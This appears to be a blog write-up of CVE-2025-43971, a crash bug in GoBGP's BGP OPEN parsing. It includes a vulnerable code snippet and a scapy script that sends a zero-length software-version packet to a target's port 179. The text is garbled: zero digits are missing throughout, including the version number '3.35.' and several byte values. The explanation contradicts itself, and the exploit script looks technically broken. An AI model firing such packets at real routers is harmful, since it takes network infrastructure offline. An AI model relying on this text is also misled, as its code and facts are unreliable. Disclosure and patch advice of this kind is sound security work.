CVE-2025-43971 - How a Zero-Length Software Version Crashes GoBGP (Before v3.35.)

GoBGP is a powerful open-source BGP implementation, widely used for building flexible network systems. If you’re using GoBGP (before version 3.35.), you need to know about CVE-2025-43971—a serious vulnerability that could crash your BGP process with a simple malformed packet.

In this post, we'll walk through how this issue works, look at the vulnerable code, and show you step-by-step how an attacker could exploit it.

What is CVE-2025-43971?

CVE-2025-43971 is a denial-of-service (DoS) vulnerability found in GoBGP versions before 3.35.. Specifically, a bug in pkg/packet/bgp/bgp.go means an attacker can send a BGP packet with a zero-valued softwareVersionLen. When GoBGP tries to process this packet, it panics and crashes. No authentication or prior access is required.

In simple terms: Anyone can send a malformed BGP packet to your GoBGP daemon and take it offline.

Here’s the key snippet from the GoBGP source (simplified for clarity)

// bgp.go (before 3.35.)
softwareVersionLen := payload[i]
i++
softwareVersion := string(payload[i : i+int(softwareVersionLen)])
i += int(softwareVersionLen)

Notice the bug? If an attacker sets softwareVersionLen to , then payload[i:i+] is a valid (empty) slice—but the code keeps executing. More dangerously, edge cases with the value or overall packet length may result in an out-of-bounds read—which in Go means a fatal panic.

How Does the Exploit Work?

An attacker sends a crafted BGP OPEN message with the Software Version Capability. They set the softwareVersionLen field to zero.

Here is Python code (using scapy) to craft and send such a BGP packet

from scapy.all import *

# Build minimal BGP OPEN with optional parameters, software version len = 
bgp_open = (
    b'\xff' * 16 +              # Marker
    b'\x00\x2e' +               # Length (46 bytes)
    b'\x01' +                   # Type: OPEN
    b'\x04' +                   # Version
    b'\xfb\xae' +               # ASN
    b'\x00\xB4' +               # Hold Time
    b'\xa\x00\x00\x01' +       # BGP Identifier
    b'\xa' +                   # Opt Param Length (10 bytes)
    # Optional Parameter (type = 255, len = 8, Software Version Cap)
    b'\xff\x08' +
        b'\x06' +               # Capability Code: 6 (Software Version)
        b'\x01' +               # Capability Length: 1
        b'\x00'                # SoftwareVersionLen = 
)

# Send to <target_ip>:179
send(IP(dst="TARGET_IP")/TCP(dport=179, sport=12345, flags="S")/Raw(bgp_open))

Upgrade GoBGP to v3.35. or later.

You can get the latest GoBGP release at:
https://github.com/osrg/gobgp/releases

GoBGP Security Advisory:

GoBGP Release Notes

CVE page:

NVD CVE-2025-43971

Source code:

GoBGP bgp.go

Conclusion

CVE-2025-43971 is a stark reminder of how a single unchecked field in protocol parsing can open the door for denial-of-service attacks. Update your GoBGP today, and watch your logs for any unexpected crashes!

If you found this writeup useful, share it with your colleagues—let’s keep the internet stable.

Timeline

Published on: 04/21/2025 01:15:45 UTC
Last modified on: 05/08/2025 15:57:42 UTC